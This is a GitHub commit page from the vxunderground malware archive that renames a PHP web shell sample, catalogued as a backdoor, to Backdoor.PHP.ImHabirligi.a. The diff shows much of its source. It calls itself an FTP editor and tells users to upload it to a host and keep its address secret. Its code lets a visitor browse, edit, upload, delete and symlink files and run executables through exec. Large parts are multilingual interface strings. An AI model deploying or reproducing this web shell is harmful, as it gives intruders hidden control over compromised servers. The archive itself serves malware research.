Rename Backdoor.PHP.Agent.z to Backdoor.PHP.ImHabirligi.a

This commit is contained in:
vxunderground 2020-10-15 20:53:48 -05:00 committed by GitHub
parent 3b3855c568
commit f52c5c59ce
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -3,11 +3,11 @@
* iMHaPFTP.php - iMHaBiRLiGi Php Ftp Editoru * iMHaPFTP.php - iMHaBiRLiGi Php Ftp Editoru
* Copyright (C) 2003-2005 iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi.com> * Copyright (C) 2003-2005 iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi.com>
* *
* Bu Kod Tamamiyle Özgür Yazilimdir. * Bu Kod Tamamiyle Özgür Yazilimdir.
* Kötü Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir * Kötü Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir
* Programin amaci ftp olmadan hostunuza baglanti kurup * Programin amaci ftp olmadan hostunuza baglanti kurup
* Dosya ekleyip kaldira bilmektir. * Dosya ekleyip kaldira bilmektir.
* Kodumuz 6 Dilde yazilmistir.Server Diline Göre Otomatik Secim Yapar. * Kodumuz 6 Dilde yazilmistir.Server Diline Göre Otomatik Secim Yapar.
* ------------------------------------------------------------------------- * -------------------------------------------------------------------------
* Kodu hosta attiktan sonra adres cubuguna kodun uzantisini verip baglanin * Kodu hosta attiktan sonra adres cubuguna kodun uzantisini verip baglanin
* Ve Asla kimseye bu kodun uzantisini vermeyiniz.!! * Ve Asla kimseye bu kodun uzantisini vermeyiniz.!!
@ -19,16 +19,16 @@
* BeweiS * BeweiS
* <BeweiS@imhabirligi.com> * <BeweiS@imhabirligi.com>
* iMHaBiRLiGi Administrator * iMHaBiRLiGi Administrator
* Php-Asp-Programlama ve Güvenlik * Php-Asp-Programlama ve Güvenlik
* *
* MicroP_ * MicroP_
* <MicroP_@imhabirligi.com> * <MicroP_@imhabirligi.com>
* iMHaBiRLiGi Administrator * iMHaBiRLiGi Administrator
* Php-Asp-Programlama ve Güvenlik * Php-Asp-Programlama ve Güvenlik
* *
* Libertical * Libertical
* <libertical@imhabirligi.com> * <libertical@imhabirligi.com>
* iMHaBiRLiGi Yönetim * iMHaBiRLiGi Yönetim
* C++, Delphi,Programlama ve Linux Hastasi * C++, Delphi,Programlama ve Linux Hastasi
* *
* PowerGhost * PowerGhost
@ -38,7 +38,7 @@
* *
* BadSector * BadSector
* ozgurkaleli@yahoo.com * ozgurkaleli@yahoo.com
* iMHaBiRLiGi Yönetim * iMHaBiRLiGi Yönetim
* VicualBasic-Delphi Programlama * VicualBasic-Delphi Programlama
* Sistemdanismani ve Linux Hastasi * Sistemdanismani ve Linux Hastasi
* *
@ -70,10 +70,10 @@ $charset = 'ISO-8859-1';
*/ */
$homedir = './'; $homedir = './';
/* Size of the Düzenle textarea /* Size of the Düzenle textarea
*/ */
$Düzenlecols = 80; $Düzenlecols = 80;
$Düzenlerows = 25; $Düzenlerows = 25;
/* ------------------------------------------- /* -------------------------------------------
* Optional configuration (reTasi # to enable) * Optional configuration (reTasi # to enable)
@ -305,7 +305,7 @@ case 'create_file':
} else { } else {
$old = @umask(0777 & ~$filepermission); $old = @umask(0777 & ~$filepermission);
if (@touch($file)) { if (@touch($file)) {
Düzenle($file); Düzenle($file);
} else { } else {
listing_page(error('not_created', $file)); listing_page(error('not_created', $file));
} }
@ -653,7 +653,7 @@ case 'create_symlink':
break; break;
case 'Düzenle': case 'Düzenle':
if (!empty($_POST['save'])) { if (!empty($_POST['save'])) {
@ -668,9 +668,9 @@ case 'D
} else { } else {
if (@is_readable($file) && @is_writable($file)) { if (@is_readable($file) && @is_writable($file)) {
Düzenle($file); Düzenle($file);
} else { } else {
listing_page(error('not_Düzenleed', $file)); listing_page(error('not_Düzenleed', $file));
} }
} }
@ -1161,7 +1161,7 @@ function listing ($list) {
} }
echo ' <th class="Görevler">' . word('Görevler') . '</th> echo ' <th class="Görevler">' . word('Görevler') . '</th>
</tr> </tr>
'; ';
@ -1252,7 +1252,7 @@ function listing ($list) {
} }
echo ' <td class="Görevler"> echo ' <td class="Görevler">
<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" /> <input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
'; ';
@ -1268,7 +1268,7 @@ function listing ($list) {
if ($file['is_file'] && $file['is_readable']) { if ($file['is_file'] && $file['is_readable']) {
$actions[] = 'Kopyala'; $actions[] = 'Kopyala';
$actions[] = 'indir'; $actions[] = 'indir';
if ($file['is_writable']) $actions[] = 'Düzenle'; if ($file['is_writable']) $actions[] = 'Düzenle';
} }
if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) { if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
$actions[] = 'execute'; $actions[] = 'execute';
@ -1372,8 +1372,8 @@ function create_box () {
} }
function Düzenle ($file) { function Düzenle ($file) {
global $self, $directory, $Düzenlecols, $Düzenlerows, $apache, $htpasswd, $htaccess; global $self, $directory, $Düzenlecols, $Düzenlerows, $apache, $htpasswd, $htaccess;
html_header(); html_header();
@ -1385,7 +1385,7 @@ function D
<tr> <tr>
<td class="dialog"> <td class="dialog">
<textarea name="content" cols="' . $Düzenlecols . '" rows="' . $Düzenlerows . '" WRAP="off">'; <textarea name="content" cols="' . $Düzenlecols . '" rows="' . $Düzenlerows . '" WRAP="off">';
if (array_key_exists('content', $_POST)) { if (array_key_exists('content', $_POST)) {
echo $_POST['content']; echo $_POST['content'];
@ -1437,7 +1437,7 @@ function D
} }
echo ' echo '
<input type="hidden" name="action" value="Düzenle" /> <input type="hidden" name="action" value="Düzenle" />
<input type="hidden" name="file" value="' . html($file) . '" /> <input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" /> <input type="hidden" name="dir" value="' . html($directory) . '" />
<input type="reset" value="' . word('reset') . '" id="red_button" /> <input type="reset" value="' . word('reset') . '" id="red_button" />
@ -1526,52 +1526,52 @@ function getwords ($lang) {
'file' => 'Datei', 'file' => 'Datei',
'filename' => 'Dateiname', 'filename' => 'Dateiname',
'size' => 'Größe', 'size' => 'Größe',
'permission' => 'Rechte', 'permission' => 'Rechte',
'owner' => 'Eigner', 'owner' => 'Eigner',
'group' => 'Gruppe', 'group' => 'Gruppe',
'other' => 'Andere', 'other' => 'Andere',
'Görevler' => 'Funktionen', 'Görevler' => 'Funktionen',
'read' => 'lesen', 'read' => 'lesen',
'write' => 'schreiben', 'write' => 'schreiben',
'execute' => 'ausführen', 'execute' => 'ausführen',
'create_symlink' => 'Symlink erstellen', 'create_symlink' => 'Symlink erstellen',
'Sil' => 'löschen', 'Sil' => 'löschen',
'Degistir' => 'umbenennen', 'Degistir' => 'umbenennen',
'Tasi' => 'verschieben', 'Tasi' => 'verschieben',
'Kopyala' => 'kopieren', 'Kopyala' => 'kopieren',
'Düzenle' => 'Düzenleieren', 'Düzenle' => 'Düzenleieren',
'indir' => 'herunterladen', 'indir' => 'herunterladen',
'upload' => 'hochladen', 'upload' => 'hochladen',
'create' => 'erstellen', 'create' => 'erstellen',
'change' => 'wechseln', 'change' => 'wechseln',
'save' => 'speichern', 'save' => 'speichern',
'set' => 'setze', 'set' => 'setze',
'reset' => 'zurücksetzen', 'reset' => 'zurücksetzen',
'relative' => 'Pfad zum Ziel relativ', 'relative' => 'Pfad zum Ziel relativ',
'yes' => 'Ja', 'yes' => 'Ja',
'no' => 'Nein', 'no' => 'Nein',
'Geri' => 'zurück', 'Geri' => 'zurück',
'Yol' => 'Ziel', 'Yol' => 'Ziel',
'symlink' => 'Symbolischer Link', 'symlink' => 'Symbolischer Link',
'no_output' => 'keine Ausgabe', 'no_output' => 'keine Ausgabe',
'user' => 'Benutzername', 'user' => 'Benutzername',
'password' => 'Kennwort', 'password' => 'Kennwort',
'add' => 'hinzufügen', 'add' => 'hinzufügen',
'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen', 'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen',
'uploaded' => '"[%1]" wurde hochgeladen.', 'uploaded' => '"[%1]" wurde hochgeladen.',
'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.', 'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
'already_exists' => '"[%1]" existiert bereits.', 'already_exists' => '"[%1]" existiert bereits.',
'created' => '"[%1]" wurde erstellt.', 'created' => '"[%1]" wurde erstellt.',
'not_created' => '"[%1]" konnte nicht erstellt werden.', 'not_created' => '"[%1]" konnte nicht erstellt werden.',
'really_Sil' => 'Sollen folgende Dateien wirklich gelöscht werden?', 'really_Sil' => 'Sollen folgende Dateien wirklich gelöscht werden?',
'Sild' => "Folgende Dateien wurden gelöscht:\n[%1]", 'Sild' => "Folgende Dateien wurden gelöscht:\n[%1]",
'not_Sild' => "Folgende Dateien konnten nicht gelöscht werden:\n[%1]", 'not_Sild' => "Folgende Dateien konnten nicht gelöscht werden:\n[%1]",
'Degistir_file' => 'Benenne Datei um:', 'Degistir_file' => 'Benenne Datei um:',
'Degistird' => '"[%1]" wurde in "[%2]" umbenannt.', 'Degistird' => '"[%1]" wurde in "[%2]" umbenannt.',
'not_Degistird' => '"[%1] konnte nicht in "[%2]" umbenannt werden.', 'not_Degistird' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
@ -1581,16 +1581,16 @@ function getwords ($lang) {
'Kopyala_files' => 'Kopiere folgende Dateien:', 'Kopyala_files' => 'Kopiere folgende Dateien:',
'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]", 'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]", 'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
'not_Düzenleed' => '"[%1]" kann nicht Düzenleiert werden.', 'not_Düzenleed' => '"[%1]" kann nicht Düzenleiert werden.',
'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}", 'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}",
'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}", 'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}",
'saved' => '"[%1]" wurde gespeichert.', 'saved' => '"[%1]" wurde gespeichert.',
'not_saved' => '"[%1]" konnte nicht gespeichert werden.', 'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.', 'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.', 'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
'permission_for' => 'Rechte für "[%1]":', 'permission_for' => 'Rechte für "[%1]":',
'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.', 'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.',
'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.', 'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.',
'not_readable' => '"[%1]" kann nicht gelesen werden.' 'not_readable' => '"[%1]" kann nicht gelesen werden.'
); );
@ -1600,34 +1600,34 @@ function getwords ($lang) {
$word_charset = 'ISO-8859-1'; $word_charset = 'ISO-8859-1';
return array( return array(
'directory' => 'Répertoire', 'directory' => 'Répertoire',
'file' => 'Fichier', 'file' => 'Fichier',
'filename' => 'Nom fichier', 'filename' => 'Nom fichier',
'size' => 'Taille', 'size' => 'Taille',
'permission' => 'Droits', 'permission' => 'Droits',
'owner' => 'Propriétaire', 'owner' => 'Propriétaire',
'group' => 'Groupe', 'group' => 'Groupe',
'other' => 'Autres', 'other' => 'Autres',
'Görevler' => 'Fonctions', 'Görevler' => 'Fonctions',
'read' => 'Lire', 'read' => 'Lire',
'write' => 'Ecrire', 'write' => 'Ecrire',
'execute' => 'Exécuter', 'execute' => 'Exécuter',
'create_symlink' => 'Créer lien symbolique', 'create_symlink' => 'Créer lien symbolique',
'Sil' => 'Effacer', 'Sil' => 'Effacer',
'Degistir' => 'Renommer', 'Degistir' => 'Renommer',
'Tasi' => 'Déplacer', 'Tasi' => 'Déplacer',
'Kopyala' => 'Copier', 'Kopyala' => 'Copier',
'Düzenle' => 'Ouvrir', 'Düzenle' => 'Ouvrir',
'indir' => 'Télécharger sur PC', 'indir' => 'Télécharger sur PC',
'upload' => 'Télécharger sur serveur', 'upload' => 'Télécharger sur serveur',
'create' => 'Créer', 'create' => 'Créer',
'change' => 'Changer', 'change' => 'Changer',
'save' => 'Sauvegarder', 'save' => 'Sauvegarder',
'set' => 'Exécuter', 'set' => 'Exécuter',
'reset' => 'Réinitialiser', 'reset' => 'Réinitialiser',
'relative' => 'Relatif', 'relative' => 'Relatif',
'yes' => 'Oui', 'yes' => 'Oui',
@ -1642,34 +1642,34 @@ function getwords ($lang) {
'add' => 'Ajouter', 'add' => 'Ajouter',
'add_basic_auth' => 'add basic-authentification', 'add_basic_auth' => 'add basic-authentification',
'uploaded' => '"[%1]" a été téléchargé sur le serveur.', 'uploaded' => '"[%1]" a été téléchargé sur le serveur.',
'not_uploaded' => '"[%1]" n a pas été téléchargé sur le serveur.', 'not_uploaded' => '"[%1]" n a pas été téléchargé sur le serveur.',
'already_exists' => '"[%1]" existe déjà.', 'already_exists' => '"[%1]" existe déjà.',
'created' => '"[%1]" a été créé.', 'created' => '"[%1]" a été créé.',
'not_created' => '"[%1]" n a pas pu être créé.', 'not_created' => '"[%1]" n a pas pu être créé.',
'really_Sil' => 'Effacer le fichier?', 'really_Sil' => 'Effacer le fichier?',
'Sild' => "Ces fichiers ont été détuits:\n[%1]", 'Sild' => "Ces fichiers ont été détuits:\n[%1]",
'not_Sild' => "Ces fichiers n ont pu être détruits:\n[%1]", 'not_Sild' => "Ces fichiers n ont pu être détruits:\n[%1]",
'Degistir_file' => 'Renomme fichier:', 'Degistir_file' => 'Renomme fichier:',
'Degistird' => '"[%1]" a été renommé en "[%2]".', 'Degistird' => '"[%1]" a été renommé en "[%2]".',
'not_Degistird' => '"[%1] n a pas pu être renommé en "[%2]".', 'not_Degistird' => '"[%1] n a pas pu être renommé en "[%2]".',
'Tasi_files' => 'Déplacer ces fichiers:', 'Tasi_files' => 'Déplacer ces fichiers:',
'Tasid' => "Ces fichiers ont été déplacés en \"[%2]\":\n[%1]", 'Tasid' => "Ces fichiers ont été déplacés en \"[%2]\":\n[%1]",
'not_Tasid' => "Ces fichiers n ont pas pu être déplacés en \"[%2]\":\n[%1]", 'not_Tasid' => "Ces fichiers n ont pas pu être déplacés en \"[%2]\":\n[%1]",
'Kopyala_files' => 'Copier ces fichiers:', 'Kopyala_files' => 'Copier ces fichiers:',
'copied' => "Ces fichiers ont été copiés en \"[%2]\":\n[%1]", 'copied' => "Ces fichiers ont été copiés en \"[%2]\":\n[%1]",
'not_copied' => "Ces fichiers n ont pas pu être copiés en \"[%2]\":\n[%1]", 'not_copied' => "Ces fichiers n ont pas pu être copiés en \"[%2]\":\n[%1]",
'not_Düzenleed' => '"[%1]" ne peut être ouvert.', 'not_Düzenleed' => '"[%1]" ne peut être ouvert.',
'executed' => "\"[%1]\" a été brillamment exécuté :\n{%2}", 'executed' => "\"[%1]\" a été brillamment exécuté :\n{%2}",
'not_executed' => "\"[%1]\" n a pas pu être exécuté:\n{%2}", 'not_executed' => "\"[%1]\" n a pas pu être exécuté:\n{%2}",
'saved' => '"[%1]" a été sauvegardé.', 'saved' => '"[%1]" a été sauvegardé.',
'not_saved' => '"[%1]" n a pas pu être sauvegardé.', 'not_saved' => '"[%1]" n a pas pu être sauvegardé.',
'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a été crée.', 'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a été crée.',
'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu être créé.', 'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu être créé.',
'permission_for' => 'Droits de "[%1]":', 'permission_for' => 'Droits de "[%1]":',
'permission_set' => 'Droits de "[%1]" ont été changés en [%2].', 'permission_set' => 'Droits de "[%1]" ont été changés en [%2].',
'permission_not_set' => 'Droits de "[%1]" n ont pas pu être changés en[%2].', 'permission_not_set' => 'Droits de "[%1]" n ont pas pu être changés en[%2].',
'not_readable' => '"[%1]" ne peut pas être ouvert.' 'not_readable' => '"[%1]" ne peut pas être ouvert.'
); );
case 'it': case 'it':
@ -1687,7 +1687,7 @@ function getwords ($lang) {
'owner' => 'Proprietario', 'owner' => 'Proprietario',
'group' => 'Gruppo', 'group' => 'Gruppo',
'other' => 'Altro', 'other' => 'Altro',
'Görevler' => 'Funzioni', 'Görevler' => 'Funzioni',
'read' => 'leggi', 'read' => 'leggi',
'write' => 'scrivi', 'write' => 'scrivi',
@ -1698,7 +1698,7 @@ function getwords ($lang) {
'Degistir' => 'rinomina', 'Degistir' => 'rinomina',
'Tasi' => 'sposta', 'Tasi' => 'sposta',
'Kopyala' => 'copia', 'Kopyala' => 'copia',
'Düzenle' => 'modifica', 'Düzenle' => 'modifica',
'indir' => 'indir', 'indir' => 'indir',
'upload' => 'upload', 'upload' => 'upload',
'create' => 'crea', 'create' => 'crea',
@ -1720,34 +1720,34 @@ function getwords ($lang) {
'add' => 'aggiungi', 'add' => 'aggiungi',
'add_basic_auth' => 'aggiungi autenticazione base', 'add_basic_auth' => 'aggiungi autenticazione base',
'uploaded' => '"[%1]" è stato caricato.', 'uploaded' => '"[%1]" è stato caricato.',
'not_uploaded' => '"[%1]" non è stato caricato.', 'not_uploaded' => '"[%1]" non è stato caricato.',
'already_exists' => '"[%1]" esiste già.', 'already_exists' => '"[%1]" esiste già.',
'created' => '"[%1]" è stato creato.', 'created' => '"[%1]" è stato creato.',
'not_created' => '"[%1]" non è stato creato.', 'not_created' => '"[%1]" non è stato creato.',
'really_Sil' => 'Cancello questi file ?', 'really_Sil' => 'Cancello questi file ?',
'Sild' => "Questi file sono stati cancellati:\n[%1]", 'Sild' => "Questi file sono stati cancellati:\n[%1]",
'not_Sild' => "Questi file non possono essere cancellati:\n[%1]", 'not_Sild' => "Questi file non possono essere cancellati:\n[%1]",
'Degistir_file' => 'File rinominato:', 'Degistir_file' => 'File rinominato:',
'Degistird' => '"[%1]" è stato rinominato in "[%2]".', 'Degistird' => '"[%1]" è stato rinominato in "[%2]".',
'not_Degistird' => '"[%1] non è stato rinominato in "[%2]".', 'not_Degistird' => '"[%1] non è stato rinominato in "[%2]".',
'Tasi_files' => 'Sposto questi file:', 'Tasi_files' => 'Sposto questi file:',
'Tasid' => "Questi file sono stati spostati in \"[%2]\":\n[%1]", 'Tasid' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
'not_Tasid' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]", 'not_Tasid' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
'Kopyala_files' => 'Copio questi file', 'Kopyala_files' => 'Copio questi file',
'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]", 'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]", 'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
'not_Düzenleed' => '"[%1]" non può essere modificato.', 'not_Düzenleed' => '"[%1]" non può essere modificato.',
'executed' => "\"[%1]\" è stato eseguito con successo:\n{%2}", 'executed' => "\"[%1]\" è stato eseguito con successo:\n{%2}",
'not_executed' => "\"[%1]\" non è stato eseguito con successo\n{%2}", 'not_executed' => "\"[%1]\" non è stato eseguito con successo\n{%2}",
'saved' => '"[%1]" è stato salvato.', 'saved' => '"[%1]" è stato salvato.',
'not_saved' => '"[%1]" non è stato salvato.', 'not_saved' => '"[%1]" non è stato salvato.',
'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" è stato creato.', 'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" è stato creato.',
'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non è stato creato.', 'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non è stato creato.',
'permission_for' => 'Permessi di "[%1]":', 'permission_for' => 'Permessi di "[%1]":',
'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].', 'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].', 'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
'not_readable' => '"[%1]" non può essere letto.' 'not_readable' => '"[%1]" non può essere letto.'
); );
case 'se': case 'se':
@ -1761,29 +1761,29 @@ function getwords ($lang) {
'filename' => 'Filnamn', 'filename' => 'Filnamn',
'size' => 'Storlek', 'size' => 'Storlek',
'permission' => 'Säkerhetsnivå', 'permission' => 'Säkerhetsnivå',
'owner' => 'Ägare', 'owner' => 'Ägare',
'group' => 'Grupp', 'group' => 'Grupp',
'other' => 'Andra', 'other' => 'Andra',
'Görevler' => 'Funktioner', 'Görevler' => 'Funktioner',
'read' => 'Läs', 'read' => 'Läs',
'write' => 'Skriv', 'write' => 'Skriv',
'execute' => 'Utför', 'execute' => 'Utför',
'create_symlink' => 'Skapa symlink', 'create_symlink' => 'Skapa symlink',
'Sil' => 'Radera', 'Sil' => 'Radera',
'Degistir' => 'Byt namn', 'Degistir' => 'Byt namn',
'Tasi' => 'Flytta', 'Tasi' => 'Flytta',
'Kopyala' => 'Kopiera', 'Kopyala' => 'Kopiera',
'Düzenle' => 'Ändra', 'Düzenle' => 'Ändra',
'indir' => 'Ladda ner', 'indir' => 'Ladda ner',
'upload' => 'Ladda upp', 'upload' => 'Ladda upp',
'create' => 'Skapa', 'create' => 'Skapa',
'change' => 'Ändra', 'change' => 'Ändra',
'save' => 'Spara', 'save' => 'Spara',
'set' => 'Markera', 'set' => 'Markera',
'reset' => 'Töm', 'reset' => 'Töm',
'relative' => 'Relative path to target', 'relative' => 'Relative path to target',
'yes' => 'Ja', 'yes' => 'Ja',
@ -1793,9 +1793,9 @@ function getwords ($lang) {
'symlink' => 'Symlink', 'symlink' => 'Symlink',
'no_output' => 'no output', 'no_output' => 'no output',
'user' => 'Användare', 'user' => 'Användare',
'password' => 'Lösenord', 'password' => 'Lösenord',
'add' => 'Lägg till', 'add' => 'Lägg till',
'add_basic_auth' => 'add basic-authentification', 'add_basic_auth' => 'add basic-authentification',
'uploaded' => '"[%1]" har laddats upp.', 'uploaded' => '"[%1]" har laddats upp.',
@ -1804,28 +1804,28 @@ function getwords ($lang) {
'created' => '"[%1]" har skapats.', 'created' => '"[%1]" har skapats.',
'not_created' => '"[%1]" kunde inte skapas.', 'not_created' => '"[%1]" kunde inte skapas.',
'really_Sil' => 'Radera dessa filer?', 'really_Sil' => 'Radera dessa filer?',
'Sild' => "De här filerna har raderats:\n[%1]", 'Sild' => "De här filerna har raderats:\n[%1]",
'not_Sild' => "Dessa filer kunde inte raderas:\n[%1]", 'not_Sild' => "Dessa filer kunde inte raderas:\n[%1]",
'Degistir_file' => 'Byt namn på fil:', 'Degistir_file' => 'Byt namn på fil:',
'Degistird' => '"[%1]" har bytt namn till "[%2]".', 'Degistird' => '"[%1]" har bytt namn till "[%2]".',
'not_Degistird' => '"[%1] kunde inte döpas om till "[%2]".', 'not_Degistird' => '"[%1] kunde inte döpas om till "[%2]".',
'Tasi_files' => 'Flytta dessa filer:', 'Tasi_files' => 'Flytta dessa filer:',
'Tasid' => "Dessa filer har flyttats till \"[%2]\":\n[%1]", 'Tasid' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
'not_Tasid' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]", 'not_Tasid' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
'Kopyala_files' => 'Kopiera dessa filer:', 'Kopyala_files' => 'Kopiera dessa filer:',
'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]", 'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]", 'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
'not_Düzenleed' => '"[%1]" kan inte ändras.', 'not_Düzenleed' => '"[%1]" kan inte ändras.',
'executed' => "\"[%1]\" har utförts:\n{%2}", 'executed' => "\"[%1]\" har utförts:\n{%2}",
'not_executed' => "\"[%1]\" kunde inte utföras:\n{%2}", 'not_executed' => "\"[%1]\" kunde inte utföras:\n{%2}",
'saved' => '"[%1]" har sparats.', 'saved' => '"[%1]" har sparats.',
'not_saved' => '"[%1]" kunde inte sparas.', 'not_saved' => '"[%1]" kunde inte sparas.',
'symlinked' => 'Symlink från "[%2]" till "[%1]" har skapats.', 'symlinked' => 'Symlink från "[%2]" till "[%1]" har skapats.',
'not_symlinked' => 'Symlink från "[%2]" till "[%1]" kunde inte skapas.', 'not_symlinked' => 'Symlink från "[%2]" till "[%1]" kunde inte skapas.',
'permission_for' => 'Rättigheter för "[%1]":', 'permission_for' => 'Rättigheter för "[%1]":',
'permission_set' => 'Rättigheter för "[%1]" ändrades till [%2].', 'permission_set' => 'Rättigheter för "[%1]" ändrades till [%2].',
'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
'not_readable' => '"[%1]" kan inte läsas.' 'not_readable' => '"[%1]" kan inte läsas.'
); );
case 'en': case 'en':
@ -1835,7 +1835,7 @@ function getwords ($lang) {
$word_charset = 'ISO-8859-1'; $word_charset = 'ISO-8859-1';
return array( return array(
'directory' => 'Düzergah', 'directory' => 'Düzergah',
'file' => 'Dosya', 'file' => 'Dosya',
'filename' => 'DosyaAdi', 'filename' => 'DosyaAdi',
@ -1843,8 +1843,8 @@ function getwords ($lang) {
'permission' => 'izin', 'permission' => 'izin',
'owner' => 'Sahip', 'owner' => 'Sahip',
'group' => 'Grup', 'group' => 'Grup',
'other' => 'Diðerleri', 'other' => 'Diðerleri',
'Görevler' => 'Görevler', 'Görevler' => 'Görevler',
'read' => 'Oku', 'read' => 'Oku',
'write' => 'Yaz', 'write' => 'Yaz',
@ -1855,9 +1855,9 @@ function getwords ($lang) {
'Degistir' => 'Degistir', 'Degistir' => 'Degistir',
'Tasi' => 'Tasi', 'Tasi' => 'Tasi',
'Kopyala' => 'Kopyala', 'Kopyala' => 'Kopyala',
'Düzenle' => 'Düzenle', 'Düzenle' => 'Düzenle',
'indir' => 'indir', 'indir' => 'indir',
'upload' => 'Yükle', 'upload' => 'Yükle',
'create' => 'Olustur', 'create' => 'Olustur',
'change' => 'Degisiklik', 'change' => 'Degisiklik',
'save' => 'Kaydet', 'save' => 'Kaydet',
@ -1870,21 +1870,21 @@ function getwords ($lang) {
'Geri' => 'Geri', 'Geri' => 'Geri',
'Yol' => 'Yol', 'Yol' => 'Yol',
'symlink' => 'Symlink', 'symlink' => 'Symlink',
'no_output' => 'Hiçbir çýktý', 'no_output' => 'Hiçbir çýktý',
'user' => 'Kullanýcý', 'user' => 'Kullanýcý',
'password' => 'Sifre', 'password' => 'Sifre',
'add' => 'Ekle', 'add' => 'Ekle',
'add_basic_auth' => 'add basic-authentification', 'add_basic_auth' => 'add basic-authentification',
'uploaded' => '"[%1]" Yüklendi.', 'uploaded' => '"[%1]" Yüklendi.',
'not_uploaded' => '"[%1]" Yüklenemedi.', 'not_uploaded' => '"[%1]" Yüklenemedi.',
'already_exists' => '"[%1]" Þimdiden var ol.', 'already_exists' => '"[%1]" Þimdiden var ol.',
'created' => '"[%1]" Olusturuldu.', 'created' => '"[%1]" Olusturuldu.',
'not_created' => '"[%1]" Olusturuldu.', 'not_created' => '"[%1]" Olusturuldu.',
'really_Sil' => 'Silinen dosyalar?', 'really_Sil' => 'Silinen dosyalar?',
'Sild' => "Bu dosyalar,oldu Sild:\n[%1]", 'Sild' => "Bu dosyalar,oldu Sild:\n[%1]",
'not_Sild' => "Bu dosyalar olamazdý Sild:\n[%1]", 'not_Sild' => "Bu dosyalar olamazdý Sild:\n[%1]",
'Degistir_file' => 'Dosyayi Degistir:', 'Degistir_file' => 'Dosyayi Degistir:',
'Degistird' => '"[%1]" Degistirildi "[%2]".', 'Degistird' => '"[%1]" Degistirildi "[%2]".',
'not_Degistird' => '"[%1] Degistirilemedi "[%2]".', 'not_Degistird' => '"[%1] Degistirilemedi "[%2]".',
@ -1894,11 +1894,11 @@ function getwords ($lang) {
'Kopyala_files' => 'Bu Dosyalari Kopyala:', 'Kopyala_files' => 'Bu Dosyalari Kopyala:',
'copied' => "Bu Dosyalar Kopyalanir \"[%2]\":\n[%1]", 'copied' => "Bu Dosyalar Kopyalanir \"[%2]\":\n[%1]",
'not_copied' => "Bu Dosyalar Kopyalanamaz \"[%2]\":\n[%1]", 'not_copied' => "Bu Dosyalar Kopyalanamaz \"[%2]\":\n[%1]",
'not_Düzenleed' => '"[%1]" Düzenle.', 'not_Düzenleed' => '"[%1]" Düzenle.',
'executed' => "\"[%1]\" Basarili bir sekilde Uygulandi:\n{%2}", 'executed' => "\"[%1]\" Basarili bir sekilde Uygulandi:\n{%2}",
'not_executed' => "\"[%1]\" Basarili bir sekilde Uygulanamadi:\n{%2}", 'not_executed' => "\"[%1]\" Basarili bir sekilde Uygulanamadi:\n{%2}",
